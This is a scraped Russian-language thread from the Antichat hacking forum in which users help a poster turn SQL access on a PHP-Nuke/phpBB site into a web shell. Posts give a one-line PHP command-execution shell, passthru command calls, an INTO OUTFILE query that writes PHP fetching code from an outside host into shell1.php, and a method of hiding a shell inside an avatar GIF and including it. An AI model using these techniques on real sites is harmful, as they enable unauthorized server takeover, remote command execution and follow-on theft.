Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.07.2007, 23:01
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
попробуй багу с подменой аватарного пути
_http://forum.antichat.ru/showpost.php?p=281765&postcount=2
|
|
|
04.07.2007, 23:11
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
хз, пробуй <? exec($_GET[cmd]); ?>
|
|
|
|
05.07.2007, 01:07
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
safe mode - off
Spyder
Не катит =(
maxster
А смысл? там-же тоже через инклуд(или ты о 7 способе?)
Последний раз редактировалось Azter; 05.07.2007 в 01:12..
|
|
|
|
05.07.2007, 02:11
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
а если сделать так?
Код:
SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Да и с путями разберись
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.07.2007, 12:41
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
Код:
SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
выбрасывает вот такую фигню
Warning: filesize() [function.filesize]: stat failed for http://host.narod.ru/files.txt in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1
Warning: fread() [function.fread]: Length parameter must be greater than 0 in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1
GrAmOzEkA
Пару раз уже говорил - не прокатит инклуд. |
|
|
|
05.07.2007, 19:28
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837
Репутация:
36
|
|
Почему бы просто не сделать так:
<? passthru("команда"); ?>
если по-другому не получается  |
|
|
|
05.07.2007, 19:34
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
andy13 - читай пост c411k на 1 странице
|
|
|
|
05.07.2007, 23:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву  http://c411k.jino-net.ru/upload/achat.gif
бэкапишь бд с запросом
Код:
SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.
__________________
ПИУ-ПИУ...
|
|
|
|
06.07.2007, 09:01
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837
Репутация:
36
|
|
Micr0b, я писал про вставку команд напрямую
passthru("uname -a; id ..."), а не про передачу их через запросы.
|
|
|
|
08.07.2007, 17:48
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348
Репутация:
1
|
|
А если там стоит ASP.Net без ПХП, то что тогда использовать?
Есть только возможность править страницу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
